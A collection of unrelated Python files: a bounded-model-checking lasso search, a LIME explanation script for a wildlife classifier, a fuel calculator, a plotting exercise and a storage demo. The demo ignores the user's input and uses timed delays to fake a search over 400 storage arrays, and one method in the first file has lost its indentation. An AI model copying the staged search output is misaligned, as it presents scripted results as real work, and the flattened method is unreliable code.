                        # so rebuild the top frame with the updated condition.
                        solver.pop()  # remove previous bad and refinements
                        solver.push()
                        for pred in self.bad:
                            solver.add_assertion(self.totime(pred, k + 1))
                        solver.add_assertions(refinements)  # re-add refinements.
                        self._new_rank_fun = False
                    try:
                        sat = solver.solve()
                    except SolverReturnedUnknownResultError:
                        sat = None
                        log("\tBMC timeout\n", BMC._LOG_LVL)
                        # Timeout leaves the solver state unknown: rebuild the
                        # whole unrolled path from scratch.
                        solver.reset_assertions()
                        # re-add path assertions
                        for pred in self.init:
                            solver.add_assertion(self.totime(pred, 0))
                        for it_k in range(k + 1):
                            for t in self.trans:
                                solver.add_assertion(self.totime(t, it_k))
                        solver.push()
                    if sat is None:
                        # notify that we might have skipped some path.
                        yield None, None, None, None
                    elif sat is True:
                        model = solver.get_model()
                        lback_idx = self._get_lback_index(model, k + 1)
                        assert isinstance(lback_idx, int)
                        assert lback_idx >= 0
                        assert lback_idx < k + 1
                        loop_core: FrozenSet[FNode] = frozenset()
                        hints_region_trans: FrozenSet[FNode] = frozenset()
                        hints_assume: FrozenSet[FNode] = frozenset()
                        try:
                            conc_model = self._try_concretize(solver, k + 1,
                                                              lback_idx)
                        except SolverReturnedUnknownResultError:
                            conc_model = None
                            log("\tBMC try-concretize timeout\n", BMC._LOG_LVL)
                            solver.reset_assertions()
                            # re-add path assertions
                            for pred in self.init:
                                solver.add_assertion(self.totime(pred, 0))
                            for it_k in range(k + 1):
                                for t in self.trans:
                                    solver.add_assertion(self.totime(t, it_k))
                            solver.push()
                        if conc_model is not None:
                            # Concrete lasso found: no abstraction needed.
                            trace = self._model2trace(conc_model, 0, k + 1,
                                                      True)
                            yield (trace, lback_idx, False, False)
                        else:
                            active_hints, hints_steps, hints_rfs = \
                                self._model2hint_comp(model, lback_idx, k + 1)
                            assert len(active_hints) == 0 or \
                                len(hints_steps) == k - lback_idx + 1
                            hints_region_trans, hints_assume = \
                                self._hint_comp2assume(active_hints, hints_steps,
                                                       lback_idx)
                            assert isinstance(hints_region_trans, frozenset)
                            assert all(isinstance(k, FNode)
                                       for k in hints_region_trans)
                            assert all(k in self.i_mgr.formulae.values()
                                       for k in hints_region_trans)
                            assert isinstance(hints_assume, frozenset)
                            assert all(isinstance(k, FNode)
                                       for k in hints_assume)
                            assert all(k in self.i_mgr.formulae.values()
                                       for k in hints_assume)
                            hint_assigns = {**{k: model.get_value(k)
                                               for k in self.hint_active},
                                            **{k if not k.is_not() else k.arg(0):
                                               self.i_mgr.TRUE() if not k.is_not()
                                               else self.i_mgr.FALSE()
                                               for k in hints_region_trans}}
                            for step in range(lback_idx, k+2):
                                for s in self.hint_symbs:
                                    timed_s = self.totime(s, step)
                                    hint_assigns[timed_s] = model.get_value(timed_s)
                            loop_core = self.generaliser.generalise_path(
                                chain(solver.assertions, hints_assume),
                                model, timed_symbs[lback_idx:],
                                lback_idx, k + 1, assume=hint_assigns)
                            assert isinstance(loop_core, frozenset)
                            assert all(c in self.i_mgr.formulae.values()
                                       for c in loop_core)
                            if __debug__:
                                from solver import Solver
                                # loop_core -> original trans
                                _trans = [self.totime(self._orig_trans, _time)
                                          for _time in range(lback_idx, k + 1)]
                                _trans = self.i_mgr.And(_trans)
                                with Solver(self.i_env) as _solver:
                                    _solver.add_assertion(self.i_mgr.Not(_trans))
                                    for c in loop_core:
                                        _solver.add_assertion(c)
                                    for pred in assign2fnodes(self.i_env,
                                                              hint_assigns):
                                        _solver.add_assertion(pred)
                                    _solver.add_assertions(hints_region_trans)
                                    sat = _solver.solve()
                                    assert sat is False
                            abst_states, abst_trans = \
                                self.generaliser.curr_next_preds(
                                    loop_core, lback_idx, k + 1, model)
                            hints_states, hints_trans = \
                                self.generaliser.curr_next_preds(
                                    hints_region_trans, lback_idx, k + 1,
                                    model)
                            trace = self._model2trace(model, 0, k + 1, True)
                            assert isinstance(trace, list), trace
                            assert len(trace) == k + 2
                            assert isinstance(abst_states, list)
                            assert isinstance(abst_trans, list)
                            assert len(abst_states) == \
                                len(trace) - lback_idx
                            assert len(abst_trans) == len(abst_states) - 1
                            assert isinstance(hints_states, list)
                            assert isinstance(hints_trans, list)
                            assert len(hints_states) == \
                                len(trace) - lback_idx
                            assert len(hints_trans) == len(hints_states) - 1
                            yield (trace, lback_idx,
                                   # abst states and trans
                                   ([frozenset(self.o_norm(s) for s in state)
                                     for state in abst_states],
                                    [frozenset(self.o_norm(t) for t in trans)
                                     for trans in abst_trans]),
                                   # hints, hints states, trans and rf.
                                   ([h.to_env(self.o_env)
                                     for h in active_hints],
                                    [frozenset(self.o_norm(s) for s in state)
                                     for state in hints_states],
                                    [frozenset(self.o_norm(t) for t in trans)
                                     for trans in hints_trans],
                                    [(rf.to_env(self.o_env), s, e)
                                     for rf, s, e in hints_rfs]))
                            del trace
                        # Exclude the loop just reported before searching on.
                        ref = self._compute_refinement(model, lback_idx, k + 1,
                                                       hints_region_trans,
                                                       hints_assume, loop_core)
                        refinements.append(ref)
                        solver.add_assertion(ref)
                solver.pop()
    def _try_concretize(self, solver, last: int, lback: int):
        """Check whether the current path closes into a CONCRETE lasso.

        Temporarily asserts equality between every original symbol at step
        `last` and at step `lback`; returns the satisfying model if one
        exists, else None.  Solver state is restored via push/pop.

        May raise SolverReturnedUnknownResultError on timeout (handled by the
        caller).
        """
        assert isinstance(last, int)
        assert last >= 0
        assert isinstance(lback, int)
        assert lback >= 0
        assert lback < last
        assert all(s in self.i_mgr.formulae.values() for s in self.all_symbs)
        model = None
        solver.push()
        # ignore additional symbols introduced by Hints.
        for s in self.orig_symbs:
            last_s = self.totime(s, last)
            lback_s = self.totime(s, lback)
            if s.symbol_type().is_bool_type():
                solver.add_assertion(self.i_mgr.Iff(last_s, lback_s))
            else:
                solver.add_assertion(self.i_mgr.Equals(last_s, lback_s))
        if solver.solve() is True:
            model = solver.get_model()
        solver.pop()
        return model
    def _get_lback_index(self, model, last) -> int:
        """Search for lback index.

        `self._in_loop` becomes true in the second state of the loop, so the
        loop-back state is the last step at which `_in_loop` is still false.
        Walks backwards from `last - 1` until that step is found.
        """
        assert last > 0
        # last state cannot be loop-back.
        assert model.get_value(self.totime(self._in_loop, last)).is_true()
        assert model.get_value(self.totime(self._in_loop, 0)).is_false()
        idx = last - 1
        while model.get_value(self.totime(self._in_loop, idx)).is_true():
            idx -= 1
            assert idx >= 0
        assert model.get_value(self.totime(self._in_loop, idx + 1)).is_true()
        assert model.get_value(self.totime(self._in_loop, idx)).is_false()
        assert model.get_value(self.totime(self.start_loop, idx)).is_true()
        return idx
def _model2trace(self, model, first: int, last: int,
to_out: bool = False) -> List[Dict[FNode, FNode]]:
assert isinstance(first, int)
assert isinstance(last, int)
assert 0 <= first < last, (first, last)
trace: List[Dict[FNode, FNode]] = [{} for _ in range(first, last + 1)]
for c_time in range(first, last + 1):
idx = c_time - first
for s in self.orig_symbs if to_out else self.all_symbs:
timed_s = self.totime(s, c_time)
v = model.get_value(timed_s)
if to_out:
s = self.o_norm(s)
v = self.o_norm(v)
assert s not in trace[idx], str(s)
trace[idx][s] = v
return trace
    def _model2hint_comp(self, model, first: int, last: int) \
            -> Tuple[List[Hint],
                     List[List[Tuple[int, bool, TransType]]],
                     List[Tuple[RankFun, int, int]]]:
        """returns list of active Hints and sequence of `states`.
        For each state reports location of each active hint and type of
        the transition to reach the following state.

        The third element lists the ranking functions exercised in the loop,
        each as (rank_fun, start_offset, end_offset) relative to `first`.
        """
        assert isinstance(first, int)
        assert isinstance(last, int)
        assert hasattr(model, "get_value")
        assert 0 <= first < last
        assert all(h.ts_lvals is not None for h in self.hints)
        assert all(h.ts_loc_symbs is not None for h in self.hints)
        # set of active hints should be constant in the loop.
        assert all(all(model.get_value(self.totime(is_active, step)).is_true()
                       for step in range(first, last+1)) or
                   all(model.get_value(self.totime(is_active, step)).is_false()
                       for step in range(first, last+1))
                   for idx, is_active in enumerate(self.hint_active))
        # hint_active predicates should be frozen.
        assert all(self.totime(act, first) == act for act in self.hint_active)
        # Filter active hints
        active_hints = [self.hints[idx]
                        for idx, is_active in enumerate(self.hint_active)
                        if model.get_value(is_active).is_true()]
        # No hints used in the current trace.
        if len(active_hints) == 0:
            return [], [], []
        # Map each hint's location-valuation formula back to a location index.
        locval2idx_lst = [{val: idx for idx, val in enumerate(h.ts_lvals)}
                          for h in active_hints]
        x_loc_idxs: List[int] = []
        for h, locval2idx in zip(active_hints, locval2idx_lst):
            # Decode the location of h at step `first` from its loc symbols.
            val = self.i_mgr.And(
                s if model.get_value(self.totime(s, first)).is_true() else
                self.i_mgr.Not(s)
                for s in h.ts_loc_symbs)
            assert val in locval2idx
            x_loc_idxs.append(locval2idx[val])
        hints_steps = [[] for _ in range(first, last)]
        hints_rfs = []
        last_rf = None
        last_rf_start_idx = None
        for curr, step in zip(hints_steps, range(first, last)):
            # fill curr with info of active_hints
            loc_idxs = x_loc_idxs
            x_loc_idxs = []
            assert len(active_hints) == len(locval2idx_lst)
            assert len(active_hints) == len(loc_idxs)
            for h, locval2idx, loc_idx in zip(active_hints, locval2idx_lst,
                                              loc_idxs):
                # find location of h at next step
                val = self.i_mgr.And(
                    s if model.get_value(self.totime(s, step + 1)).is_true()
                    else self.i_mgr.Not(s) for s in h.ts_loc_symbs)
                assert val in locval2idx
                x_loc_idx = locval2idx[val]
                assert isinstance(x_loc_idx, int)
                assert 0 <= x_loc_idx < len(h)
                x_loc_idxs.append(x_loc_idx)
                trans_type = None
                is_ranked = False
                if model.get_value(self.totime(h.t_is_stutter, step)).is_true():
                    trans_type = TransType.STUTTER
                    if h[loc_idx].rf is not None:
                        rf_pred = self.totime(h[loc_idx].rf.is_ranked, step)
                        is_ranked = model.get_value(rf_pred).is_true()
                elif model.get_value(self.totime(h.t_is_ranked, step)).is_true():
                    trans_type = TransType.RANKED
                    is_ranked = True
                    rf = h[loc_idx].rf
                    assert rf is not None
                    # Track the interval over which rf stays ranked; when it
                    # stops being ranked at step + 1 the interval is closed
                    # and recorded in hints_rfs.
                    if model.get_value(self.totime(self.i_mgr.Not(rf.is_ranked),
                                                   step + 1)).is_true():
                        if not last_rf:
                            assert last_rf_start_idx is None
                            last_rf = rf
                            last_rf_start_idx = step - first
                        assert last_rf is not None
                        assert last_rf_start_idx is not None
                        assert 0 <= last_rf_start_idx <= step - first
                        hints_rfs.append((last_rf, last_rf_start_idx,
                                          step - first))
                        last_rf = None
                        last_rf_start_idx = None
                    else:
                        assert last_rf is None or last_rf == rf
                        last_rf = rf
                        last_rf_start_idx = step - first + 1
                else:
                    assert model.get_value(self.totime(h.t_is_progress, step)).is_true()
                    trans_type = TransType.PROGRESS
                curr.append((loc_idx, is_ranked, trans_type))
                if __debug__:
                    assert step < last
                    # check model is in the identified restricted region.
                    formula = self.totime(h[loc_idx].region, step)
                    assert model.get_value(formula).is_true()
                    formula = self.totime(h[loc_idx].assume, step)
                    assert model.get_value(formula).is_true()
                    formula = self.totime(h[x_loc_idx].region, step + 1)
                    assert model.get_value(formula).is_true()
                    formula = self.totime(h[x_loc_idx].assume, step + 1)
                    assert model.get_value(formula).is_true()
                    # check that the identified transition holds in model.
                    if trans_type == TransType.STUTTER:
                        assert x_loc_idx == loc_idx
                        trans = h[loc_idx].stutterT
                        formula = self.totime(trans, step)
                        assert model.get_value(formula).is_true()
                        if h[loc_idx].rf is not None:
                            rf = h[loc_idx].rf.expr
                            formula = self.i_mgr.Equals(self.totime(rf, step),
                                                        self.totime(rf, step + 1))
                            assert model.get_value(formula).is_true()
                    elif trans_type == TransType.RANKED:
                        assert h[loc_idx].rf is not None
                        assert x_loc_idx == loc_idx
                        trans = h[loc_idx].rankT
                        formula = self.totime(trans, step)
                        assert model.get_value(formula).is_true()
                        formula = self.totime(h[loc_idx].rf.progress_pred(), step)
                        assert model.get_value(formula).is_true()
                    else:
                        assert trans_type == TransType.PROGRESS
                        assert x_loc_idx in h[loc_idx].dsts
                        trans = self.totime(h[loc_idx].progress(x_loc_idx), step)
                        assert model.get_value(trans).is_true()
                        if h[x_loc_idx].rf is not None:
                            ranked = self.totime(
                                self.i_mgr.Not(h[loc_idx].rf.is_ranked),
                                step)
                            assert model.get_value(ranked).is_true()
                    # end debug
        return active_hints, hints_steps, hints_rfs
    def _hint_comp2assume(self, hints: List[Hint],
                          steps: List[List[Tuple[int, bool, TransType]]],
                          first: int) -> Tuple[FrozenSet[FNode],
                                               FrozenSet[FNode]]:
        """Build dictionary from predicates to the corresponding truth assignment
        as prescribed by the selected hints.

        Returns two frozensets of canonised literals: region/transition
        predicates of the hint path, and the hints' assume predicates.
        """
        assert all(isinstance(h, Hint) for h in hints)
        assert all(isinstance(s, list) for s in steps)
        assert all(len(s) == len(hints) for s in steps)
        assert all(isinstance(s, tuple) for step in steps for s in step)
        assert all(len(s) == 3 for step in steps for s in step)
        assert all(isinstance(s[0], int) for step in steps for s in step)
        assert all(isinstance(s[1], bool) for step in steps for s in step)
        assert all(isinstance(s[2], TransType) for step in steps for s in step)
        assert isinstance(first, int)
        assert first >= 0
        if len(hints) == 0:
            return frozenset(), frozenset()
        def assign_true(pred: FNode, res: Set[FNode]):
            # Decompose conjunctions and push negations; collect the
            # canonised literals that must hold.
            assert isinstance(pred, FNode)
            assert isinstance(res, set)
            preds = [pred]
            while preds:
                pred = preds.pop()
                if pred.is_and():
                    preds.extend(pred.args())
                elif pred.is_not():
                    assign_false(pred.arg(0), res)
                elif not pred.is_true():
                    assert not pred.is_false()
                    res.add(self.cn(pred))
        def assign_false(pred: FNode, res: Set[FNode]):
            # Dual of assign_true: decompose disjunctions and collect the
            # canonised negations.
            assert isinstance(pred, FNode)
            assert isinstance(res, set)
            preds = [pred]
            while preds:
                pred = preds.pop()
                if pred.is_or():
                    preds.extend(pred.args())
                elif pred.is_not():
                    assign_true(pred.arg(0), res)
                elif not pred.is_false():
                    assert not pred.is_true()
                    if pred.is_lt() or pred.is_le():
                        res.add(self.cn(not_rel(self.i_env, pred)))
                    else:
                        res.add(self.cn(self.i_mgr.Not(pred)))
        res_regions_trans: Set[FNode] = set()
        res_assumes: Set[FNode] = set()
        for step_idx, step in enumerate(steps):
            c_time = step_idx + first
            # Wrap around: the successor of the last step is the loop-back.
            x_step_idx = (step_idx + 1) % len(steps)
            for hint_idx, (hint, (loc_idx, is_ranked, trans_t)) in enumerate(
                    zip(hints, step)):
                assert isinstance(hint, Hint)
                assert isinstance(loc_idx, int)
                assert isinstance(trans_t, TransType)
                loc = hint[loc_idx]
                assign_true(self.totime(loc.region, c_time), res_regions_trans)
                assign_true(self.totime(loc.assume, c_time), res_assumes)
                if loc.rf is not None:
                    if is_ranked:
                        assign_true(self.totime(loc.rf.is_ranked, c_time),
                                    res_regions_trans)
                    else:
                        assign_false(self.totime(loc.rf.is_ranked, c_time),
                                     res_regions_trans)
                x_loc_idx = steps[x_step_idx][hint_idx][0]
                assert isinstance(x_loc_idx, int)
                if trans_t == TransType.PROGRESS:
                    trans = loc.progress(x_loc_idx)
                elif trans_t == TransType.STUTTER:
                    trans = loc.stutterT
                else:
                    assert trans_t == TransType.RANKED
                    trans = loc.rankT
                assert trans is not None
                assert isinstance(trans, FNode)
                assert not trans.is_false()
                assert trans in self.i_mgr.formulae.values()
                assign_true(self.totime(trans, c_time), res_regions_trans)
        assert all(self.cn(p) == p for p in res_regions_trans)
        assert all(self.cn(p) == p for p in res_assumes)
        return frozenset(res_regions_trans), frozenset(res_assumes)
    def _compute_refinement(self, model, lback_idx: int, last_idx: int,
                            hints_region_trans: FrozenSet[FNode],
                            hints_assume: FrozenSet[FNode],
                            loop_core: FrozenSet[FNode]) -> FNode:
        """Return a clause excluding the loop just found.

        The refinement is Not(And(...)) over the hint predicates and the
        generalised loop core; when no loop core is available, it falls back
        to the literal truth assignment of the transition atoms along the
        loop.  Symbols prefixed "_J"/"_EL_" (auxiliary encoding symbols) are
        ignored.
        """
        assert hasattr(model, "get_value")
        assert isinstance(lback_idx, int)
        assert isinstance(last_idx, int)
        assert 0 <= lback_idx < last_idx
        assert isinstance(hints_region_trans, frozenset)
        assert isinstance(hints_assume, frozenset)
        assert all(isinstance(p, FNode) for p in hints_region_trans)
        assert all(p in self.i_mgr.formulae.values()
                   for p in hints_region_trans)
        assert all(self.cn(p) == p for p in hints_region_trans)
        assert all(1 <= len(ExprAtTime.collect_times(self.i_mgr, p)) <= 2
                   for p in hints_region_trans)
        assert all(max(ExprAtTime.collect_times(self.i_mgr, p)) <= last_idx
                   for p in hints_region_trans)
        assert all(model.get_value(p).is_true() for p in hints_region_trans)
        assert all(isinstance(p, FNode) for p in hints_assume)
        assert all(p in self.i_mgr.formulae.values() for p in hints_assume)
        assert all(self.cn(p) == p for p in hints_assume)
        assert all(1 <= len(ExprAtTime.collect_times(self.i_mgr, p)) <= 2
                   for p in hints_assume)
        assert all(max(ExprAtTime.collect_times(self.i_mgr, p)) <= last_idx
                   for p in hints_assume)
        assert all(model.get_value(p).is_true() for p in hints_assume)
        assert isinstance(loop_core, frozenset)
        assert all(isinstance(p, FNode) for p in loop_core)
        assert all(p in self.i_mgr.formulae.values() for p in loop_core)
        assert all(self.cn(p) == p for p in loop_core)
        assert all(1 <= len(ExprAtTime.collect_times(self.i_mgr, p)) <= 2
                   for p in loop_core)
        assert all(max(ExprAtTime.collect_times(self.i_mgr, p)) <= last_idx
                   for p in loop_core)
        assert all(model.get_value(p).is_true() for p in loop_core)
        def to_ignore(s: FNode):
            # Skip auxiliary symbols introduced by other encodings.
            if s.is_not():
                s = s.arg(0)
            assert not s.is_not()
            return s.is_symbol() and (s.symbol_name().startswith("_J") or
                                      s.symbol_name().startswith("_EL_"))
        res = set(hints_region_trans | hints_assume)
        res.update(p for p in loop_core if not to_ignore(p))
        if not loop_core:
            # No generalisation available: block the exact atom valuation of
            # the transition relation along the loop.
            i_get_atoms = self.i_env.ao.get_atoms
            atms = frozenset(atm for atm in i_get_atoms(self._orig_trans)
                             if not to_ignore(atm))
            for idx in range(lback_idx, last_idx):
                for atm in atms:
                    assert not atm.is_not()
                    atm = self.totime(atm, idx)
                    assert 1 <= len(ExprAtTime.collect_times(self.i_mgr, atm)) <= 2
                    assert max(ExprAtTime.collect_times(self.i_mgr, atm)) <= last_idx
                    if model.get_value(atm).is_false():
                        atm = self.i_mgr.Not(atm)
                    assert model.get_value(atm).is_true()
                    res.add(atm)
            for atm in atms:
                atm = self.totime(atm, last_idx)
                if max(ExprAtTime.collect_times(self.i_mgr, atm)) <= last_idx:
                    if model.get_value(atm).is_false():
                        atm = self.i_mgr.Not(atm)
                    assert model.get_value(atm).is_true()
                    res.add(atm)
        assert all(not s.symbol_name().startswith("_J") and
                   not s.symbol_name().startswith("_EL_")
                   for pred in res
                   for s in self.i_env.fvo.get_free_variables(pred))
        assert all(model.get_value(p).is_true() for p in res)
        return self.i_mgr.Not(self.i_mgr.And(res))
|
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import numpy as np
import os, json
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models, transforms
from torch.autograd import Variable
from PIL import Image
from models import get_net
from lime import lime_image
from skimage.segmentation import mark_boundaries
def get_image(path):
    """Load the image file at `path` and return it as an RGB PIL image."""
    abs_path = os.path.abspath(path)
    with open(abs_path, 'rb') as handle, Image.open(handle) as img:
        return img.convert('RGB')
def get_pil_transform():
    """Return the PIL-level preprocessing: resize to 256x256, then
    center-crop to 224x224 (applied before tensor conversion)."""
    return transforms.Compose([
        transforms.Resize((256, 256)),
        transforms.CenterCrop(224),
    ])
def get_preprocess_transform():
    """Return the tensor-level preprocessing: ToTensor followed by
    ImageNet mean/std normalization."""
    imagenet_norm = transforms.Normalize(mean=[0.485, 0.456, 0.406],
                                         std=[0.229, 0.224, 0.225])
    return transforms.Compose([transforms.ToTensor(), imagenet_norm])
def batch_predict(images):
    """Classification function handed to LIME: map a list of PIL images to
    per-class probabilities using the module-level `model` and
    `preprocess_transform`.

    Returns an (N, 2) numpy array of [P(class 0), P(class 1)] rows.
    """
    model.eval()
    batch = torch.stack(tuple(preprocess_transform(i) for i in images), dim=0)
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    model.to(device)
    batch = batch.to(device)
    logits = model(batch)
    #probs = torch.sigmoid(logits)
    # if you don't pass 2 probs, LIME always classifies all examples in the coyote category
    probs = torch.cat((1-torch.sigmoid(logits), torch.sigmoid(logits)), 1)
    return probs.detach().cpu().numpy()
def generate_explanations(images, outfile, num_samples, num_features, seed=123):
    """Generate and plot LIME explanations for each image path in `images`.

    Produces one figure row per image with three panels: the original image,
    the positively-contributing superpixels, and the negatively-contributing
    ones.  The figure is saved to `outfile` and shown interactively.

    :param images: list of image file paths.
    :param outfile: path the combined figure is written to.
    :param num_samples: perturbed samples LIME sends to the classifier.
    :param num_features: per-image list of superpixel counts to display.
    :param seed: random seed forwarded to the explainer.
    """
    # Sanity check: run the classifier once on a duplicated first image.
    img = get_image(images[0])
    test_pred = batch_predict([pill_transf(img), pill_transf(img)])
    print("test prediction logic", test_pred)
    fig = plt.figure(constrained_layout=True, figsize=(5, 20))
    spec = gridspec.GridSpec(ncols=3, nrows=len(images), figure=fig)
    i = 0
    for img in images:
        img = get_image(img)
        explainer = lime_image.LimeImageExplainer(feature_selection='highest_weights', verbose=True, random_state=123)
        explanation = explainer.explain_instance(np.array(pill_transf(img)),
                                             batch_predict, # classification function
                                             top_labels=1,
                                             hide_color=0,
                                             num_samples=num_samples, # number of images that will be sent to classification function
                                             random_seed=seed)
        print("label: ", explanation.top_labels[0])
        # Positive evidence for the predicted label.
        temp, mask = explanation.get_image_and_mask(explanation.top_labels[0],
                                                positive_only=True, negative_only=False,
                                                num_features=num_features[i], hide_rest=True)
        img_boundry1 = mark_boundaries(temp/255.0, mask)
        # Negative evidence for the predicted label.
        temp, mask = explanation.get_image_and_mask(explanation.top_labels[0],
                                                positive_only=False, negative_only=True,
                                                num_features=num_features[i], hide_rest=True)
        img_boundry2 = mark_boundaries(temp/255.0, mask)
        f_ax1 = fig.add_subplot(spec[i, 0], xticks=[], yticks=[])
        f_ax2 = fig.add_subplot(spec[i, 1], xticks=[], yticks=[])
        f_ax3 = fig.add_subplot(spec[i, 2], xticks=[], yticks=[])
        f_ax1.imshow(img)
        f_ax2.imshow(img_boundry1)
        f_ax3.imshow(img_boundry2)
        i += 1
    plt.savefig(outfile, dpi=300, bbox_inches='tight', pad_inches=0) # To save figure
    plt.show() # To show figure
if __name__ == "__main__":
    # Checkpoint to explain; alternatives used for other figures:
    #model_filename="./models/wildcam_1501_0.001_40_10000.0_IRM.pth"
    #model_filename="./models/wildcam_1501_0.001_0_0.0_ERM.pth"
    #model_filename="./models/wildcam_denoised_121_0.001_40_10000.0_IRM.pth"
    model_filename="./models/wildcam_denoised_121_0.001_0_0.0_ERM.pth"

    # Rebuild the network architecture and load the trained weights on CPU.
    net = get_net("WILDCAM")
    model = net(n_classes=2)
    print("loading model")
    model.load_state_dict(torch.load(model_filename, map_location="cpu"))
    model.to("cpu")

    pill_transf = get_pil_transform()
    preprocess_transform = get_preprocess_transform()

    # Explain a fixed panel of 7 coyote + 6 raccoon test images.  The
    # per-image feature counts were hand-tuned for readable figures.
    # (Large blocks of dead, commented-out single-image experiments were
    # removed here; they performed no work at runtime.)
    generate_explanations(
        images=[
            '../../../data/wildcam_subset_denoised/test/coyote/5903ccce-23d2-11e8-a6a3-ec086b02610b.jpg',
            '../../../data/wildcam_subset_denoised/test/coyote/59373454-23d2-11e8-a6a3-ec086b02610b.jpg',
            '../../../data/wildcam_subset_denoised/test/coyote/58c7efed-23d2-11e8-a6a3-ec086b02610b.jpg',
            '../../../data/wildcam_subset_denoised/test/coyote/58adc310-23d2-11e8-a6a3-ec086b02610b.jpg',
            '../../../data/wildcam_subset_denoised/test/coyote/59279c0b-23d2-11e8-a6a3-ec086b02610b.jpg',
            '../../../data/wildcam_subset_denoised/test/coyote/5903cc2e-23d2-11e8-a6a3-ec086b02610b.jpg',
            '../../../data/wildcam_subset_denoised/test/coyote/5865e36a-23d2-11e8-a6a3-ec086b02610b.jpg',
            '../../../data/wildcam_subset_denoised/test/raccoon/593a4e8a-23d2-11e8-a6a3-ec086b02610b.jpg',
            '../../../data/wildcam_subset_denoised/test/raccoon/5879d289-23d2-11e8-a6a3-ec086b02610b.jpg',
            '../../../data/wildcam_subset_denoised/test/raccoon/58629252-23d2-11e8-a6a3-ec086b02610b.jpg',
            '../../../data/wildcam_subset_denoised/test/raccoon/591fd104-23d2-11e8-a6a3-ec086b02610b.jpg',
            '../../../data/wildcam_subset_denoised/test/raccoon/58a8a170-23d2-11e8-a6a3-ec086b02610b.jpg',
            '../../../data/wildcam_subset_denoised/test/raccoon/58e40d0c-23d2-11e8-a6a3-ec086b02610b.jpg',
        ],
        outfile='./figures/ERM_denoised_results.png',
        num_samples=1000,
        num_features=[10, 10, 10, 10, 10, 5, 10, 20, 10, 5, 20, 10, 20],
        seed=123)
|
13,195 | 29cf8be26357c806e49d5c73116d3fd956dfe522 | import math
def mass_fuel_calculator(input):
    """Return the fuel required to launch a module: floor(mass / 3) - 2.

    NOTE(review): the parameter name shadows the builtin ``input``; it is
    kept unchanged so existing keyword callers keep working.
    """
    thirds = input / 3
    return math.floor(thirds) - 2
# Main method
if __name__ == '__main__':
    # Sum the fuel requirement of every module listed in the input file,
    # one mass per line.
    filepath = "inputList"
    totalFuel = 0
    with open(filepath) as fp:
        for line in fp:
            totalFuel += mass_fuel_calculator(int(line))
print(int(totalFuel)) |
13,196 | 5b586d679e6c5f6aad67f69c1054c35a05b7ddf9 | """
Instructions: Complete each TODO below. The TODO's are put into sections for separate graphs. Each section
can be done with different data if desired, and if the data allows the questin to be answered. Filtering should
be done, if needed. Example data can be found at ./Data/.
License:
Copyright 2021 Douglas Bowman
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# Datasets and locations can be found at .\PracticalProgramming\Session 7 - Python\Instructional Material\In-Class Exercises\Data\
# For the following TODO's, use a data set with a single x-y series
# Workable data set: Any
# TODO: Plot basic data using an appropriate plot type.
# TODO: Add an appropriate x-label, y-label, and title.
# TODO: Turn the grid on.
# TODO: Change the x-axis limits and y-axis limits to more fully show the data
# (i.e. change the limits to as much data can be seen on the plot as
# possible).
# TODO: Change the font sizes of the x-label, y-label, and title to be visible.
# Make the title fontsize bigger than the labels.
# TODO: Output the graph to a file.
# For the following TODO's, multiple x-y series will be needed to plot on the
# same graph.
# Workable data sets:
# NYC_Expense_Actuals.csv
# Inflation 1980-2020.csv
# 2020_earthquakes_4_5_plus.csv
#
# TODO: Plot 5 series using an appropriate plot type. Ensure each data series
# has a different color, as well as different markers. Different line
# styles may be used in place of markers as long as each series is
# distinguishable in black and white.
# TODO: Add a legend. Put it in an opportune place to minimize covering of
# data.
# TODO: Add an appropriate x-label, y-label, and title.
# TODO: Add an annotation to depict an abnormal event in the data.
# For the following TODO's, put each graph on its own subplot.
# Workable data set:
# NYC_Expense_Actuals.csv
# Inflation 1980-2020.csv
# 2020_earthquakes_4_5_plus.csv
#
# TODO: Plot 5 series using an appropriate plot type. Ensure each data series
# is on its own plot in the subplot, and uses a different type of plot.
# Hint: think about plotting metadata, such as number of agencies per
# year, or how much portion of all funds the city fund has per year).
# TODO: Add an appropriate x-label, y-label, and title for each subplot.
# TODO: Reset x and y limits, as well as size and spacing, to get the data to
# show as best as possible. If multiple subplots would work better, feel
# free to create them.
# TODO: Adjust tick sizes and tick rotation as necessary to show data.
# TODO: Print the plot to a file. |
13,197 | edb87df5e388ce83ebb6cc3b28ba7aad19848707 | import pandas
import numpy
import time
def pull():
    """Placeholder for a future record-retrieval routine; does nothing yet."""
    return None
def main():
    """Run the scripted HCA/IBM Spectrum Virtualize demo.

    Loads two mock patient-record spreadsheets, prompts for a patient
    name, then prints the records with staged delays that simulate a
    federated search across many storage arrays.
    """
    # Two snapshots of the same patient's records, from different years.
    excel_data_df_1 = pandas.read_excel('2012.xlsx', sheet_name= 'Sheet1')
    excel_data_df_2 = pandas.read_excel('2019.xlsx', sheet_name= 'Sheet1')
    print("Welcome to the HCA Healthcare IBM Technical Demo!")
    print("Here we will show how Spectrum Virtualize will operate over various storage arrays in the case of a particular patient")
    print("Please enter a patients name to pull all information regarding them")
    # The scripted demo ignores the entered name and always shows
    # Carlson Jensen's records.
    x = input()
    print("Searching over 400 storage arrays...")
    curr_time = time.time()
    # time.sleep replaces the original CPU-burning busy-wait loops; the
    # results are still revealed at the same wall-clock offsets (5 s and
    # 12 s after the search starts).
    time.sleep(max(0.0, curr_time + 5 - time.time()))
    print("Found Records of Carlson Jensen from 2012...")
    print(excel_data_df_1)
    time.sleep(max(0.0, curr_time + 12 - time.time()))
    print("Found Records of Carlson Jensen from 2019...")
    print(excel_data_df_2)
    print("Search complete, merging records into a homogonous storage array")
